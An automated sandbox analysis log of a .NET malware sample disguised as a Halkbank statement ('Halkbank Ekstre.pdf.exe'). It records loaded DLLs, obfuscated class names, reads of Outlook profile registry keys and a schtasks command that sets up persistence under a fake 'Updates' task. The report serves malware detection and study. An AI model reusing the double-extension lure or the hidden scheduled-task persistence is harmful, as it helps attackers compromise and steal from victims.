                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dll
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeSection loaded: mscoree.dll
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeSection loaded: kernel.appcore.dll
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeSection loaded: version.dll
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeSection loaded: uxtheme.dll
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeSection loaded: windows.storage.dll
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeSection loaded: wldp.dll
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeSection loaded: profapi.dll
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeSection loaded: cryptsp.dll
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeSection loaded: rsaenh.dll
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeSection loaded: cryptbase.dll
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeSection loaded: rasapi32.dll
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeSection loaded: rasman.dll
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeSection loaded: rtutils.dll
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeSection loaded: mswsock.dll
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeSection loaded: winhttp.dll
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeSection loaded: ondemandconnroutehelper.dll
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeSection loaded: iphlpapi.dll
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeSection loaded: dhcpcsvc6.dll
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeSection loaded: dhcpcsvc.dll
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeSection loaded: dnsapi.dll
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeSection loaded: winnsi.dll
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeSection loaded: rasadhlp.dll
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeSection loaded: fwpuclnt.dll
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeSection loaded: secur32.dll
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeSection loaded: sspicli.dll
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeSection loaded: schannel.dll
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeSection loaded: mskeyprotect.dll
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeSection loaded: ntasn1.dll
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeSection loaded: ncrypt.dll
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeSection loaded: ncryptsslp.dll
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeSection loaded: msasn1.dll
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeSection loaded: gpapi.dll
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeSection loaded: dpapi.dll
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                    Source: Window RecorderWindow detected: More than 3 window changes detected
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                    Source: Halkbank Ekstre.pdf.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                    Source: Halkbank Ekstre.pdf.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: Halkbank Ekstre.pdf.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                    Source: Binary string: srmB.pdb source: Halkbank Ekstre.pdf.exe, uAHDaCgpWpsogA.exe.0.dr
                    Source: Binary string: srmB.pdbSHA256 source: Halkbank Ekstre.pdf.exe, uAHDaCgpWpsogA.exe.0.dr

                    Data Obfuscation

                    barindex
                    Source: 0.2.Halkbank Ekstre.pdf.exe.6a70000.5.raw.unpack, MainForm.cs.Net Code: _206D_206A_206B_200E_200F_206F_206E_200C_200F_202B_202E_206A_200C_202A_200C_206D_200C_206F_200C_206E_202E_200B_202B_200D_206C_206C_200E_200D_200D_200F_206D_206F_206A_206F_200D_206C_202C_206D_206C_206C_202E System.Reflection.Assembly.Load(byte[])
                    Source: 0.2.Halkbank Ekstre.pdf.exe.4320e78.2.raw.unpack, VyF3LrZTnRfCPUYiQo.cs.Net Code: qXZpoaIYZd System.Reflection.Assembly.Load(byte[])
                    Source: 0.2.Halkbank Ekstre.pdf.exe.4298e58.3.raw.unpack, VyF3LrZTnRfCPUYiQo.cs.Net Code: qXZpoaIYZd System.Reflection.Assembly.Load(byte[])
                    Source: 0.2.Halkbank Ekstre.pdf.exe.3823dc8.0.raw.unpack, MainForm.cs.Net Code: _206D_206A_206B_200E_200F_206F_206E_200C_200F_202B_202E_206A_200C_202A_200C_206D_200C_206F_200C_206E_202E_200B_202B_200D_206C_206C_200E_200D_200D_200F_206D_206F_206A_206F_200D_206C_202C_206D_206C_206C_202E System.Reflection.Assembly.Load(byte[])
                    Source: 0.2.Halkbank Ekstre.pdf.exe.3843de8.4.raw.unpack, MainForm.cs.Net Code: _206D_206A_206B_200E_200F_206F_206E_200C_200F_202B_202E_206A_200C_202A_200C_206D_200C_206F_200C_206E_202E_200B_202B_200D_206C_206C_200E_200D_200D_200F_206D_206F_206A_206F_200D_206C_202C_206D_206C_206C_202E System.Reflection.Assembly.Load(byte[])
                    Source: Halkbank Ekstre.pdf.exeStatic PE information: 0xB57AE987 [Fri Jun 25 22:41:11 2066 UTC]
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeCode function: 0_2_06A708BC push ecx; ret 0_2_06A708BD
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeCode function: 0_2_06A73EFD push ebx; iretd 0_2_06A73EFF
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeCode function: 0_2_06A71181 push dword ptr [69202F34h]; ret 0_2_06A711A6
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeCode function: 0_2_06A71BD9 push ss; ret 0_2_06A71BDA
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeCode function: 0_2_025C727C push ecx; iretd 0_2_025C7257
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeCode function: 9_2_06FF9241 push es; ret 9_2_06FF9244
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeCode function: 10_2_059B2788 push 080599BBh; iretd 10_2_059B278D
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeCode function: 10_2_059B5DD3 push ecx; ret 10_2_059B5DD4
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeCode function: 10_2_059B4C98 pushfd ; iretd 10_2_059B4CA1
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeCode function: 10_2_076ABE19 push 00076E16h; retf 10_2_076ABE25
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeCode function: 17_2_017D9C30 push esp; retf 0185h17_2_017D9D55
                    Source: Halkbank Ekstre.pdf.exeStatic PE information: section name: .text entropy: 7.601026158908665
                    Source: uAHDaCgpWpsogA.exe.0.drStatic PE information: section name: .text entropy: 7.601026158908665
                    Source: 0.2.Halkbank Ekstre.pdf.exe.4320e78.2.raw.unpack, wvGf3HMMix1iG68Ks1m.csHigh entropy of concatenated method names: 'i9mmAokSbD', 'zmxmzWkV03', 'hvLPL2X4hs', 'wn0PMDUiEb', 'pvWP4JqsND', 'XPUPw9fdfE', 'NE1PpdQikZ', 'CnFP9WOAb7', 'KufPUqfSQ0', 'zr3PNHLJx0'
                    Source: 0.2.Halkbank Ekstre.pdf.exe.4320e78.2.raw.unpack, pLBtrKsqsc2mU2nMSg.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'eD64tw6Dqh', 'vFf4AnF7VA', 'HBh4zZbUn9', 'huuwLq4DNK', 'cbDwMSmaSB', 'w06w4siPHJ', 'm0RwwCJLon', 'ylgdnwyIsYdbCtvl0lx'
                    Source: 0.2.Halkbank Ekstre.pdf.exe.4320e78.2.raw.unpack, fskFMTQvUvBKdNLjaa.csHigh entropy of concatenated method names: 'bXANO8jJwS', 'vtuNypLtY5', 'gMXNa35g3U', 'xJINub13wV', 'GPeNkcgc3B', 'mWINnby8S0', 'Qx4N83X2fT', 'Dd9N5h3Ku0', 'AQZNt1gcoy', 'jYTNA2AUYj'
                    Source: 0.2.Halkbank Ekstre.pdf.exe.4320e78.2.raw.unpack, HbgmRAcbd9UriixnOC.csHigh entropy of concatenated method names: 'keAJGTFcaH', 'GRSJb4UL5l', 'GjEs22gWi8', 'aeMs0jPLvI', 'HHfshuvP2y', 'J6Ys1jsQ4v', 'UJ0srP0NTL', 'EvHsY7Ye3I', 'qpJsVHU36m', 'tEdsTuFVrL'
                    Source: 0.2.Halkbank Ekstre.pdf.exe.4320e78.2.raw.unpack, AiuqfvA7tCsZt0nIOj.csHigh entropy of concatenated method names: 'L4NmslLO6O', 'VELmJQnByG', 'VoNmRSDKoM', 'wWNmliiYMG', 'gB7mH4Zg1q', 'lx0mZRorNV', 'Next', 'Next', 'Next', 'NextBytes'
                    Source: 0.2.Halkbank Ekstre.pdf.exe.4320e78.2.raw.unpack, s7Ir7irVkHNL8Hrwru.csHigh entropy of concatenated method names: 'ITYlUbX8ic', 'G1Mls5odT0', 'hHflRQMKgv', 'V7JRA4u0Fy', 'iv6RzRxwMq', 'xf4lLnsZAT', 'dwplMZiHON', 'nuKl44678N', 'Q8ilw1QsPJ', 'TfAlp7MMLc'
                    Source: 0.2.Halkbank Ekstre.pdf.exe.4320e78.2.raw.unpack, XkGl3dOC5iY8CCvPpO.csHigh entropy of concatenated method names: 'WbfvTBjRf6', 'x0JvqNKB6o', 'X29vOm89YW', 'vwJvykUt1T', 'EO3vdKTZoC', 'aynv2sZNmi', 'F0Hv0VtCY6', 'YWtvhmUeXI', 'JTCv11CdD9', 'KN4vr5beOX'
                    Source: 0.2.Halkbank Ekstre.pdf.exe.4320e78.2.raw.unpack, WkKyK7nbTK5CdCEUPp.csHigh entropy of concatenated method names: 'eWmK5kENPm', 'CofKAXJU6Y', 'yLU3LiLVaD', 'ueT3Mk8EKB', 'uLeKgqd8OL', 'wsxKqT5DPd', 'vwZKEgjNPI', 'sFwKO4pnse', 'CePKywaSex', 'o6IKaypFec'
                    Source: 0.2.Halkbank Ekstre.pdf.exe.4320e78.2.raw.unpack, MYu4xHtDfEfRW8jrOZ.csHigh entropy of concatenated method names: 'lQYHfOqfLN', 'VQsHdS2EUZ', 'mfrH2GGiKb', 'VgqH0gUkOs', 'mneHhi7fym', 'kPGH104ORT', 'KgCHrRsN0U', 'OAEHYIobCv', 'fP6HVNtOXc', 'Py7HTESqqG'
                    Source: 0.2.Halkbank Ekstre.pdf.exe.4320e78.2.raw.unpack, DZPgcIVA8ODdlPkZxD.csHigh entropy of concatenated method names: 'AbilWOOxhg', 'umilIoe9Ok', 'WAelo4F7bB', 'aC0lSRlOj8', 'XBclGbBt9w', 'ceVlChU8qm', 'fUnlbBnCTi', 'd1jlQHJ8Kp', 'WwjlBPb25S', 'D0klcTxxTk'
                    Source: 0.2.Halkbank Ekstre.pdf.exe.4320e78.2.raw.unpack, MssHojpeKv8VN6JGBo.csHigh entropy of concatenated method names: 'LBUMlskFMT', 'oUvMZBKdNL', 'KIwM7r0mXe', 'XELMFg2bgm', 'wxnMvOCEim', 'GgFM6nGpuG', 'ek1ymOOXNo7Sk1YnJ8', 'VRBouH2RZ9hdD54oPk', 'e1IMMAIEll', 'W2SMwp9jup'
                    Source: 0.2.Halkbank Ekstre.pdf.exe.4320e78.2.raw.unpack, VyF3LrZTnRfCPUYiQo.csHigh entropy of concatenated method names: 'SfLw9SatMy', 'JTTwUASRFG', 'xIjwNWcFms', 'JPAwsnG8dk', 'ENqwJXEZFP', 'KDTwRHFFOu', 'SPuwl1fasL', 'So8wZTPvrk', 'lj7wXc8Nnk', 'TY5w7c4dkZ'
                    Source: 0.2.Halkbank Ekstre.pdf.exe.4320e78.2.raw.unpack, A5UsvpMpEHJkn9qDU9W.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'UuZxHXtbMR', 'ASyxmJdmUl', 'MFVxP39OTf', 'lUIxxNaV2b', 'VAyxedmJUr', 'rPnxiOAH4g', 'f1qxjhlqyq'
                    Source: 0.2.Halkbank Ekstre.pdf.exe.4320e78.2.raw.unpack, jP1unyN2oGvDwh64gi.csHigh entropy of concatenated method names: 'Dispose', 'IfdMtK9nLs', 'zlq4db25qe', 'Yrr8IZEvkW', 'MIjMAU77O4', 'i8JMzFyXh0', 'ProcessDialogKey', 'n9V4LYu4xH', 'nfE4MfRW8j', 'LOZ44Siuqf'
                    Source: 0.2.Halkbank Ekstre.pdf.exe.4320e78.2.raw.unpack, GTur6B8yg2fdK9nLsV.csHigh entropy of concatenated method names: 'OfOHvSqCyE', 'LECHKx3rVf', 'h5lHHHs1PA', 'd9rHP4Qsoo', 'WovHe7EDGx', 'LsiHj5y3LA', 'Dispose', 'lH23Uq4P2X', 'JiU3N5HD1H', 're83sLAyuc'
                    Source: 0.2.Halkbank Ekstre.pdf.exe.4320e78.2.raw.unpack, wyeF51BIwr0mXe5ELg.csHigh entropy of concatenated method names: 'XIKsSweCfZ', 'yA9sCRFmuo', 'z49sQ3jam8', 'upisBhOxGJ', 'ISXsvH0717', 'sJms6V30fP', 'MEbsKpaaWX', 'qlFs30palP', 'D88sHbgkTk', 'F8LsmRqekg'
                    Source: 0.2.Halkbank Ekstre.pdf.exe.4320e78.2.raw.unpack, eHeeXe43slst5aE0UG.csHigh entropy of concatenated method names: 'PuZo2oYSh', 'yInScGcCi', 'oMTCBfnlw', 'lQFbLUncs', 'X3eBACXmw', 'vA1crES6c', 'VQvQ2PTTVGGcSA8Ifm', 'vHCWNKtlvFrWwsy1DK', 'Qcu3tK5w1', 'GMTmiEV5K'
                    Source: 0.2.Halkbank Ekstre.pdf.exe.4320e78.2.raw.unpack, HWm1sQEuyj2n7x1BDG.csHigh entropy of concatenated method names: 'FiTDQQw5dh', 'rF7DB8dtdA', 'ONGDftOEgY', 'afrDdKJMxl', 'yJcD0BFToR', 'lr8DhQJcc9', 'AJlDrIkWgJ', 'syqDYrVcr7', 'GQJDTm09pV', 'o0vDgm48Py'
                    Source: 0.2.Halkbank Ekstre.pdf.exe.4320e78.2.raw.unpack, PVvodQz53Vi2yTjvSW.csHigh entropy of concatenated method names: 'zOWmCErDcx', 'X9PmQo6jMs', 'rPUmBS8F1u', 'Us7mfq1hSr', 'VsBmdyZWnh', 'ryUm0FEXVr', 'jUdmhQmOP1', 'TadmjXkG2T', 'ej1mW3xyVH', 'Bw1mI0wmsA'
                    Source: 0.2.Halkbank Ekstre.pdf.exe.4320e78.2.raw.unpack, ceKrCKM4dLdlJ2Gs3fI.csHigh entropy of concatenated method names: 'ToString', 'm2APQcxT9E', 'GyaPBQ3hyV', 'Tq0PcLmjMv', 'XxlPfa0WZP', 'r3DPdNddHj', 'dqvP2s964V', 'gjwP0fB0Zb', 'nHPa2h1NZjodDNgiQHL', 'I5Ue6k1OqXyvPk49mmv'
                    Source: 0.2.Halkbank Ekstre.pdf.exe.4320e78.2.raw.unpack, QimdgFfnGpuGaih5x5.csHigh entropy of concatenated method names: 'vlDR9E60of', 'mi9RNI5eKS', 'fBYRJpTe2A', 'sibRlCrWkd', 'lwkRZdP7JC', 'H3CJkILYVB', 'YMOJn8EEgK', 'n18J8MqwkJ', 'jpZJ5wgdZ8', 'vPnJtQbWOs'
                    Source: 0.2.Halkbank Ekstre.pdf.exe.4298e58.3.raw.unpack, wvGf3HMMix1iG68Ks1m.csHigh entropy of concatenated method names: 'i9mmAokSbD', 'zmxmzWkV03', 'hvLPL2X4hs', 'wn0PMDUiEb', 'pvWP4JqsND', 'XPUPw9fdfE', 'NE1PpdQikZ', 'CnFP9WOAb7', 'KufPUqfSQ0', 'zr3PNHLJx0'
                    Source: 0.2.Halkbank Ekstre.pdf.exe.4298e58.3.raw.unpack, pLBtrKsqsc2mU2nMSg.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'eD64tw6Dqh', 'vFf4AnF7VA', 'HBh4zZbUn9', 'huuwLq4DNK', 'cbDwMSmaSB', 'w06w4siPHJ', 'm0RwwCJLon', 'ylgdnwyIsYdbCtvl0lx'
                    Source: 0.2.Halkbank Ekstre.pdf.exe.4298e58.3.raw.unpack, fskFMTQvUvBKdNLjaa.csHigh entropy of concatenated method names: 'bXANO8jJwS', 'vtuNypLtY5', 'gMXNa35g3U', 'xJINub13wV', 'GPeNkcgc3B', 'mWINnby8S0', 'Qx4N83X2fT', 'Dd9N5h3Ku0', 'AQZNt1gcoy', 'jYTNA2AUYj'
                    Source: 0.2.Halkbank Ekstre.pdf.exe.4298e58.3.raw.unpack, HbgmRAcbd9UriixnOC.csHigh entropy of concatenated method names: 'keAJGTFcaH', 'GRSJb4UL5l', 'GjEs22gWi8', 'aeMs0jPLvI', 'HHfshuvP2y', 'J6Ys1jsQ4v', 'UJ0srP0NTL', 'EvHsY7Ye3I', 'qpJsVHU36m', 'tEdsTuFVrL'
                    Source: 0.2.Halkbank Ekstre.pdf.exe.4298e58.3.raw.unpack, AiuqfvA7tCsZt0nIOj.csHigh entropy of concatenated method names: 'L4NmslLO6O', 'VELmJQnByG', 'VoNmRSDKoM', 'wWNmliiYMG', 'gB7mH4Zg1q', 'lx0mZRorNV', 'Next', 'Next', 'Next', 'NextBytes'
                    Source: 0.2.Halkbank Ekstre.pdf.exe.4298e58.3.raw.unpack, s7Ir7irVkHNL8Hrwru.csHigh entropy of concatenated method names: 'ITYlUbX8ic', 'G1Mls5odT0', 'hHflRQMKgv', 'V7JRA4u0Fy', 'iv6RzRxwMq', 'xf4lLnsZAT', 'dwplMZiHON', 'nuKl44678N', 'Q8ilw1QsPJ', 'TfAlp7MMLc'
                    Source: 0.2.Halkbank Ekstre.pdf.exe.4298e58.3.raw.unpack, XkGl3dOC5iY8CCvPpO.csHigh entropy of concatenated method names: 'WbfvTBjRf6', 'x0JvqNKB6o', 'X29vOm89YW', 'vwJvykUt1T', 'EO3vdKTZoC', 'aynv2sZNmi', 'F0Hv0VtCY6', 'YWtvhmUeXI', 'JTCv11CdD9', 'KN4vr5beOX'
                    Source: 0.2.Halkbank Ekstre.pdf.exe.4298e58.3.raw.unpack, WkKyK7nbTK5CdCEUPp.csHigh entropy of concatenated method names: 'eWmK5kENPm', 'CofKAXJU6Y', 'yLU3LiLVaD', 'ueT3Mk8EKB', 'uLeKgqd8OL', 'wsxKqT5DPd', 'vwZKEgjNPI', 'sFwKO4pnse', 'CePKywaSex', 'o6IKaypFec'
                    Source: 0.2.Halkbank Ekstre.pdf.exe.4298e58.3.raw.unpack, MYu4xHtDfEfRW8jrOZ.csHigh entropy of concatenated method names: 'lQYHfOqfLN', 'VQsHdS2EUZ', 'mfrH2GGiKb', 'VgqH0gUkOs', 'mneHhi7fym', 'kPGH104ORT', 'KgCHrRsN0U', 'OAEHYIobCv', 'fP6HVNtOXc', 'Py7HTESqqG'
                    Source: 0.2.Halkbank Ekstre.pdf.exe.4298e58.3.raw.unpack, DZPgcIVA8ODdlPkZxD.csHigh entropy of concatenated method names: 'AbilWOOxhg', 'umilIoe9Ok', 'WAelo4F7bB', 'aC0lSRlOj8', 'XBclGbBt9w', 'ceVlChU8qm', 'fUnlbBnCTi', 'd1jlQHJ8Kp', 'WwjlBPb25S', 'D0klcTxxTk'
                    Source: 0.2.Halkbank Ekstre.pdf.exe.4298e58.3.raw.unpack, MssHojpeKv8VN6JGBo.csHigh entropy of concatenated method names: 'LBUMlskFMT', 'oUvMZBKdNL', 'KIwM7r0mXe', 'XELMFg2bgm', 'wxnMvOCEim', 'GgFM6nGpuG', 'ek1ymOOXNo7Sk1YnJ8', 'VRBouH2RZ9hdD54oPk', 'e1IMMAIEll', 'W2SMwp9jup'
                    Source: 0.2.Halkbank Ekstre.pdf.exe.4298e58.3.raw.unpack, VyF3LrZTnRfCPUYiQo.csHigh entropy of concatenated method names: 'SfLw9SatMy', 'JTTwUASRFG', 'xIjwNWcFms', 'JPAwsnG8dk', 'ENqwJXEZFP', 'KDTwRHFFOu', 'SPuwl1fasL', 'So8wZTPvrk', 'lj7wXc8Nnk', 'TY5w7c4dkZ'
                    Source: 0.2.Halkbank Ekstre.pdf.exe.4298e58.3.raw.unpack, A5UsvpMpEHJkn9qDU9W.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'UuZxHXtbMR', 'ASyxmJdmUl', 'MFVxP39OTf', 'lUIxxNaV2b', 'VAyxedmJUr', 'rPnxiOAH4g', 'f1qxjhlqyq'
                    Source: 0.2.Halkbank Ekstre.pdf.exe.4298e58.3.raw.unpack, jP1unyN2oGvDwh64gi.csHigh entropy of concatenated method names: 'Dispose', 'IfdMtK9nLs', 'zlq4db25qe', 'Yrr8IZEvkW', 'MIjMAU77O4', 'i8JMzFyXh0', 'ProcessDialogKey', 'n9V4LYu4xH', 'nfE4MfRW8j', 'LOZ44Siuqf'
                    Source: 0.2.Halkbank Ekstre.pdf.exe.4298e58.3.raw.unpack, GTur6B8yg2fdK9nLsV.csHigh entropy of concatenated method names: 'OfOHvSqCyE', 'LECHKx3rVf', 'h5lHHHs1PA', 'd9rHP4Qsoo', 'WovHe7EDGx', 'LsiHj5y3LA', 'Dispose', 'lH23Uq4P2X', 'JiU3N5HD1H', 're83sLAyuc'
                    Source: 0.2.Halkbank Ekstre.pdf.exe.4298e58.3.raw.unpack, wyeF51BIwr0mXe5ELg.csHigh entropy of concatenated method names: 'XIKsSweCfZ', 'yA9sCRFmuo', 'z49sQ3jam8', 'upisBhOxGJ', 'ISXsvH0717', 'sJms6V30fP', 'MEbsKpaaWX', 'qlFs30palP', 'D88sHbgkTk', 'F8LsmRqekg'
                    Source: 0.2.Halkbank Ekstre.pdf.exe.4298e58.3.raw.unpack, eHeeXe43slst5aE0UG.csHigh entropy of concatenated method names: 'PuZo2oYSh', 'yInScGcCi', 'oMTCBfnlw', 'lQFbLUncs', 'X3eBACXmw', 'vA1crES6c', 'VQvQ2PTTVGGcSA8Ifm', 'vHCWNKtlvFrWwsy1DK', 'Qcu3tK5w1', 'GMTmiEV5K'
                    Source: 0.2.Halkbank Ekstre.pdf.exe.4298e58.3.raw.unpack, HWm1sQEuyj2n7x1BDG.csHigh entropy of concatenated method names: 'FiTDQQw5dh', 'rF7DB8dtdA', 'ONGDftOEgY', 'afrDdKJMxl', 'yJcD0BFToR', 'lr8DhQJcc9', 'AJlDrIkWgJ', 'syqDYrVcr7', 'GQJDTm09pV', 'o0vDgm48Py'
                    Source: 0.2.Halkbank Ekstre.pdf.exe.4298e58.3.raw.unpack, PVvodQz53Vi2yTjvSW.csHigh entropy of concatenated method names: 'zOWmCErDcx', 'X9PmQo6jMs', 'rPUmBS8F1u', 'Us7mfq1hSr', 'VsBmdyZWnh', 'ryUm0FEXVr', 'jUdmhQmOP1', 'TadmjXkG2T', 'ej1mW3xyVH', 'Bw1mI0wmsA'
                    Source: 0.2.Halkbank Ekstre.pdf.exe.4298e58.3.raw.unpack, ceKrCKM4dLdlJ2Gs3fI.csHigh entropy of concatenated method names: 'ToString', 'm2APQcxT9E', 'GyaPBQ3hyV', 'Tq0PcLmjMv', 'XxlPfa0WZP', 'r3DPdNddHj', 'dqvP2s964V', 'gjwP0fB0Zb', 'nHPa2h1NZjodDNgiQHL', 'I5Ue6k1OqXyvPk49mmv'
                    Source: 0.2.Halkbank Ekstre.pdf.exe.4298e58.3.raw.unpack, QimdgFfnGpuGaih5x5.csHigh entropy of concatenated method names: 'vlDR9E60of', 'mi9RNI5eKS', 'fBYRJpTe2A', 'sibRlCrWkd', 'lwkRZdP7JC', 'H3CJkILYVB', 'YMOJn8EEgK', 'n18J8MqwkJ', 'jpZJ5wgdZ8', 'vPnJtQbWOs'
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeFile created: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeJump to dropped file

                    Boot Survival

                    barindex
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\uAHDaCgpWpsogA" /XML "C:\Users\user\AppData\Local\Temp\tmp9D32.tmp"

                    Hooking and other Techniques for Hiding and Protection

                    barindex
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: Possible double extension: pdf.exeStatic PE information: Halkbank Ekstre.pdf.exe
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
